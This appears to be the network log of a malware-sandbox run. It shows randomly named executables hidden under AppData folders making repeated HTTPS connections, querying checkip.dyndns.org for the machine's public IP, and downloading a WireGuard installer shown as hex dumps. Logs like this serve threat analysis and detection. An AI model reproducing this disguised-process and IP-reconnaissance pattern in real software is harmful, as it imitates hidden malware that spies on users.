Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49779	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49877	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49878	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49879	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49882	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49881	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49883	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49884	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49885	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49887	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49888	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49790	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49889	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49891	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49892	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49890	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49893	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49895	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49894	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49897	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49898	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49896	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49795	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49901	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49899	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49900	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49903	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49904	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49905	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49906	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49907	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49908	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49909	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49799	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49910	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49911	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49913	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49912	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49914	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49777	132.226.247.73	80	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2023 22:34:58.600563049 CEST	8	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2023 22:34:58.811151028 CEST	41	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:34:58 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.84</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49803	132.226.8.169	80	C:\Users\user\AppData\Roaming\audddd\audddd.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2023 22:36:18.115209103 CEST	7358	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2023 22:36:18.372566938 CEST	7358	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:18 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.84</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49802	193.122.130.0	80	C:\Users\user\AppData\Roaming\audddd\audddd.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2023 22:36:19.076669931 CEST	7359	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2023 22:36:22.082824945 CEST	7418	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Oct 3, 2023 22:36:27.037920952 CEST	7827	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:26 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.84</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49801	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49824	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49825	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49826	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49775	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	Direction	Data
2023-10-03 20:34:58 UTC	OUT	GET /windows-client/latest.sig HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64) Host: download.wireguard.com
2023-10-03 20:34:58 UTC	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:34:58 GMT Content-Type: application/octet-stream Content-Length: 436 Last-Modified: Wed, 22 Dec 2021 17:52:10 GMT Connection: close ETag: "61c365ca-1b4" Server: ZX2C4 Web Server Strict-Transport-Security: max-age=15768020; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2023-10-03 20:34:58 UTC	IN	Data Raw: 75 6e 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 76 65 72 69 66 79 20 77 69 74 68 20 77 69 72 65 67 75 61 72 64 2d 77 69 6e 64 6f 77 73 2d 72 65 6c 65 61 73 65 2e 70 75 62 0a 52 57 52 4e 71 47 4b 74 42 58 66 74 4b 51 39 43 31 45 5a 34 49 2b 33 38 4c 71 52 69 63 61 64 58 32 49 59 62 46 70 48 55 70 77 55 73 5a 47 52 76 35 55 66 67 67 66 69 68 4e 67 76 45 6c 70 62 57 50 59 4c 79 34 49 66 76 31 39 38 43 31 65 53 64 62 45 54 46 4a 46 46 72 75 51 78 33 64 41 39 56 53 67 77 3d 0a 37 30 65 65 64 66 62 37 61 61 61 33 37 62 38 36 35 31 64 62 32 31 32 30 63 37 39 35 38 62 65 65 62 30 33 31 39 63 66 64 65 61 38 39 30 38 61 39 30 61 64 30 61 39 35 66 65 63 32 38 64 62 33 39 20 20 77 69 72 65 67 75 61 72 64 2d 61 6d 64 36 34 2d 30 2e 35 2e 33 2e 6d 73 69 0a 34 Data Ascii: untrusted comment: verify with wireguard-windows-release.pubRWRNqGKtBXftKQ9C1EZ4I+38LqRicadX2IYbFpHUpwUsZGRv5UfggfihNgvElpbWPYLy4Ifv198C1eSdbETFJFFruQx3dA9VSgw=70eedfb7aaa37b8651db2120c7958beeb0319cfdea8908a90ad0a95fec28db39 wireguard-amd64-0.5.3.msi4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49776	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:34:58 UTC	1	OUT	GET /windows-client/wireguard-amd64-0.5.3.msi HTTP/1.1 Connection: Keep-Alive User-Agent: WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64) Host: download.wireguard.com
2023-10-03 20:34:58 UTC	1	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:34:58 GMT Content-Type: application/octet-stream Content-Length: 2842624 Last-Modified: Wed, 22 Dec 2021 17:52:10 GMT Connection: close ETag: "61c365ca-2b6000" Server: ZX2C4 Web Server Strict-Transport-Security: max-age=15768020; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2023-10-03 20:34:58 UTC	1	IN	Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: >
2023-10-03 20:34:58 UTC	17	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2023-10-03 20:34:58 UTC	33	IN	Data Raw: 1a 83 2e 98 fc 02 2a 4f f8 47 b0 42 04 11 85 1b e5 3e 91 26 24 00 17 0d 12 c4 45 90 9f b9 34 a4 f1 12 18 66 c8 f1 14 83 01 04 dc 17 e2 dd e6 71 1f 6d 5a ec ce ee 03 67 4c be 69 a7 0b a3 9d e8 52 9a c7 26 26 b8 d5 f4 87 29 dd ad f2 d6 a2 54 81 61 8f 2e 73 3b 0f 28 89 25 84 7f 4e a5 07 bf ac 29 c1 48 37 aa 68 aa 93 ce 16 bc 21 cd 07 e2 c8 b7 15 f6 96 0a cf cc 49 0d 8b b6 0b 52 f8 f6 00 a8 5c 91 5c bc 17 eb 5f ed c9 62 d8 4a d2 79 11 8c 98 ab 00 0c dd 12 5f 3b 78 38 e2 e9 2a 2f ab 6d 34 c0 f1 7e f1 72 8f c9 0d dd 43 99 f4 5c f0 64 dd f1 81 c6 1c 4c 18 b6 a0 6d 14 c3 44 3e 5b 0f 99 59 dc e8 0b ed ac 56 62 78 d0 eb 24 28 19 e7 4d eb 3d 44 82 a6 4d ea 2e ca a3 aa ec 45 8f 13 4a 3c 55 0d 44 0c d5 56 49 32 df 6b b1 5c 64 11 cd 35 ad 7f ed 4f a8 2b 11 96 7b 01 c0 Data Ascii: .OGB>&$E4fqmZgLiR&&)Ta.s;(%N)H7h!IR\\_bJy_;x8/m4~rC\dLmD>[YVbx$(M=DM.EJ<UDVI2k\d5O+{
2023-10-03 20:34:58 UTC	49	IN	Data Raw: cc e5 d7 92 db 37 ac 99 e7 d9 54 9b 24 8b cd c2 0c 42 1e 79 1b 94 0b 86 be 3d 54 f8 3c ab 9d e1 c9 29 32 79 64 9d 57 e3 69 8f a4 b7 6e 22 4f 4d 8f e8 67 27 95 7a 10 9c cc ff 19 d1 b7 c2 ec 92 e3 7d 0a b4 9f 6f 58 ea 17 96 2f 28 17 e6 f5 0a e0 d7 0d ea 19 18 b2 7d 01 4e f5 7f 75 b2 5e 31 fc 9c 0b 51 b8 a7 e1 5d 12 86 29 e6 69 9c 1e 1a 5f ef 5e 25 25 cc fa fe 67 99 c6 62 42 90 53 05 46 09 62 59 53 a7 1b 30 eb b8 de 91 90 a6 17 9f e3 aa 6f ac e0 9d 47 98 68 a6 6f 6e 17 95 46 f5 ab 6f 48 06 cf 25 54 49 f7 56 2d fc 64 19 8a 45 c2 c3 73 12 2c 82 bd 20 54 45 a6 7c 34 d1 80 32 c7 0d dd 01 e3 92 af 82 ff 1e 89 91 94 12 be e4 4a 59 bb b8 7d 43 f6 b6 f0 bf 02 2f 17 7f 45 5f ae 01 cb b0 61 9a 9b a6 ce 4f e2 22 06 5e 34 6d bf c0 b1 ee e2 64 a9 0b 1b 0a 6e 6c 47 77 57 Data Ascii: 7T$By=T<)2ydWin"OMg'z}oX/(}Nu^1Q])i_^%%gbBSFbYS0oGhonFoH%TIV-dEs, TE\|42JY}C/E_aO"^4mdnlGwW
2023-10-03 20:34:58 UTC	65	IN	Data Raw: 09 08 7a d3 ba 0b 6d 73 ad e5 de 40 01 cf 2c c0 f0 d2 96 50 55 6a a3 9d eb bc d4 78 27 7f bd 7a 3d 11 5f b9 89 3c 56 01 5b d6 0c 77 b4 13 02 4e 36 09 72 75 d7 3e af f8 91 0e 15 32 f7 04 fd 52 41 3e 9f 36 7a 99 9d 49 65 9d e8 74 38 0e e1 74 57 d4 bd 67 59 85 f5 5d 0e 77 71 6c ba e4 24 e6 56 91 eb 3a ec f1 75 3a 0e 3a 52 b8 e8 80 9f 59 3c 4a 11 49 d8 d1 a5 4b f3 76 2b fe dd ac e7 4c 45 5e 8c a9 24 ae 3d 97 d7 5b 4c da 98 55 cc 98 7c 56 05 02 2a 45 3d 37 72 a2 bd 98 bf b1 cc e3 35 b8 4b 97 85 dd c0 cb a2 2e 8a c2 fc 6a 62 b0 73 28 2f d0 ab 1c 49 62 03 6b a5 f1 cf e0 f2 bf e7 f8 0f ab 60 09 99 3f a7 a2 13 3d 49 79 17 91 68 f2 a8 b2 f4 11 02 a3 cb e6 90 b2 b9 f0 2c 39 73 b8 d3 54 3a 37 26 b8 ae 39 8a d5 d0 ed 63 a8 de 12 a6 e5 fd 4d 25 58 2c 16 6b 10 fb a9 39 Data Ascii: zms@,PUjx'z=_<V[wN6ru>2RA>6zIet8tWgY]wql$V:u::RY<JIKv+LE^$=[LU\|V*E=7r5K.jbs(/Ibk`?=Iyh,9sT:7&9cM%X,k9
2023-10-03 20:34:58 UTC	81	IN	Data Raw: 6f c3 24 46 23 26 2b e1 a4 f6 87 85 c6 cd f9 26 18 61 2f c0 7d c2 3e f7 db f5 74 47 df cf 54 90 a2 48 af 2f 66 27 61 47 e0 21 bd 0a 99 62 7a c0 15 7f 90 30 4d 88 69 db af fa 73 12 40 5d 02 90 f4 0c 0d 00 49 7d 91 0e 42 fb 97 8e a5 66 fa 87 ce fb 2d 82 eb a0 cf e7 64 ed 0f 51 26 51 4e a1 4a 19 9d dd 05 b0 9b 16 de b1 4f eb a6 61 47 40 92 74 bd b2 fe 14 a0 62 60 11 f5 d8 ec 93 7f f2 85 fd f2 2e a0 49 54 ca 48 ec dd 7a 73 f0 99 fb 56 5a c1 40 52 32 ba 4b 33 cb 79 21 0d 02 6e 62 79 9a 5c 80 63 20 2c f2 78 ff 89 95 ab b0 5f 7f b4 f0 c1 33 3c f5 4f db 36 3b 4c 63 a3 4a 9c c5 8a c7 eb fc 2c 74 87 22 ea be 04 6a 8a 6f 00 aa 88 70 10 93 d5 d0 06 c9 82 c2 9d 6d 67 8a 18 02 dd 93 19 18 53 3d 51 30 a8 5c 6f 1a e8 4b 10 7a b3 c2 0a 78 56 aa e4 8c 3c 19 52 f7 69 f9 04 Data Ascii: o$F#&+&a/}>tGTH/f'aG!bz0Mis@]I}Bf-dQ&QNJOaG@tb`.ITHzsVZ@R2K3y!nby\c ,x_3<O6;LcJ,t"jopmgS=Q0\oKzxV<Ri
2023-10-03 20:34:58 UTC	97	IN	Data Raw: ab 5b 6d 3b e8 43 01 81 eb 2c 6c ca 13 46 07 7e 59 b6 b2 35 6d 3c 9b 58 3b 6c 0a 68 84 44 eb c6 87 4f b1 d3 f5 5b fd 56 2d 3b 7f 8d d0 8d 86 05 2e 4e 55 6a ad bc 13 d0 14 e5 ba 23 ce e3 23 2c 39 4f 3e 30 ed aa eb 56 a0 02 c0 de 0c 42 c5 1d ad 09 d0 3c 88 05 bf 9a 14 f0 ce 08 28 bd 6c 5e 08 e0 11 d8 b0 85 43 b9 f7 e6 7e dc 44 39 7c d7 d3 e4 11 1b b8 0f be 56 0c bc 42 27 40 3d 0a d3 2b 75 f6 1f 1e e2 42 d4 5c a8 90 13 e1 0c 55 35 24 52 45 2d 62 5b 48 ae 2a 09 92 c8 59 c5 a7 42 fe cc 0d 0f cb 3a f9 d1 ae fe 83 94 45 9c 31 74 ab c2 e8 e3 18 80 5e 91 df 33 48 5c 84 9a cc 72 ae 8f df 15 83 6e cf f9 40 ed 50 23 b5 3c 74 22 fd 0b 31 b3 2c c7 6b 16 76 f0 65 da b0 87 3d 0d b0 1e ac 5e be 42 68 ea ac 13 39 75 b9 3a 8c 2b 7b ad db 12 99 ea 99 07 e3 54 0b 7b 30 83 74 Data Ascii: [m;C,lF~Y5m<X;lhDO[V-;.NUj##,9O>0VB<(l^C~D9\|VB'@=+uB\U5$RE-b[H*YB:E1t^3H\rn@P#<t"1,kve=^Bh9u:+{T{0t
2023-10-03 20:34:58 UTC	113	IN	Data Raw: 75 3b 8e a9 06 43 82 20 31 06 c0 fa 89 6c b1 c0 38 4c c3 7f 82 a1 ab dd 38 11 60 04 6c 68 54 bb 28 30 f0 36 66 d6 c8 24 4b a1 f3 a3 29 bf 62 26 2a 7a 44 ee c2 ed 9e 73 32 aa d4 f5 02 93 92 ba ce fa ac 10 ec 93 29 1d af 36 09 37 0c 38 7a f7 4d 4a d7 0b 75 9b 37 8d 57 00 00 a2 68 ca a6 44 39 00 80 03 55 fa 22 71 bd 80 77 f5 cb 63 c3 9b 0c ec ca e2 7a 77 6b ca d0 ce f5 34 6d b7 86 d7 80 9b 5d a6 ff a9 57 e8 74 41 0a c4 bf 20 21 c2 0c 85 95 bd 72 65 8c f3 02 46 04 14 f3 d2 54 4f 96 9d ba 98 19 cc 0d 45 8f 25 7b d1 0e 64 12 81 5b 05 3d 5b 3e e3 82 d3 8b 63 6e 74 39 d0 f2 62 4a 62 0c 43 74 a4 dd 11 e3 d7 18 0f 14 b1 13 5a 85 b8 40 e5 b8 4f 90 4e 6f 07 46 4e 6f d3 db 86 63 05 d9 e8 f6 99 1f e2 58 87 cd 0c 09 b0 b8 6f 31 8e 9d 73 0e e0 1a 7b 35 09 14 96 b7 ac 01 Data Ascii: u;C 1l8L8`lhT(06f$K)b&*zDs2)678zMJu7WhD9U"qwczwk4m]WtA !reFTOE%{d[=[>cnt9bJbCtZ@ONoFNocXo1s{5
2023-10-03 20:34:58 UTC	129	IN	Data Raw: 97 53 b6 ec b1 5c cf 80 07 d9 5e ab 0c e5 2d d7 08 ac f4 02 d6 f1 46 d7 56 ad e7 b8 94 ef 28 52 15 99 09 e3 07 41 6e 19 f2 ae e2 b9 fe b2 e8 28 1a 26 a9 59 6f e5 cc 19 fc 71 b1 e4 25 4b a8 cd 81 df a9 38 1d 2b ea be e9 54 18 df e0 56 22 50 9a 3c 99 0d 15 e5 db cf 60 e5 80 cb 53 7a 6f f4 6d fc 25 70 3f 14 70 e2 db 18 64 a6 7b 89 3c 61 b6 9b 17 c5 99 fa ef ee 3f 55 1e 1b f4 09 96 0e d8 43 b9 24 17 78 01 e1 f6 19 f2 e8 22 32 ee a8 4f dd 22 33 10 39 6f d2 ba 1b 70 64 45 cd 02 22 dc 17 b3 b9 b3 bd 1a 09 e9 44 0e c9 44 ea 1e 6d 12 f2 65 9a 48 ea a8 d8 00 93 6a 41 f2 10 f0 24 33 a7 f8 f6 ee b3 fb 46 d8 4e e4 ce 23 ee 35 d7 16 8b fd 2e 7c cd 2c 0c e6 9e e7 1f 5a 3a 9a 9f 29 11 38 8b 14 ea 26 11 aa 13 66 55 93 d1 9c 14 9a 26 e4 d6 91 08 61 fb 5f e2 49 00 8f bf 12 Data Ascii: S\^-FV(RAn(&Yoq%K8+TV"P<`Szom%p?pd{<a?UC$x"2O"39opdE"DDmeHjA$3FN#5.\|,Z:)8&fU&a_I
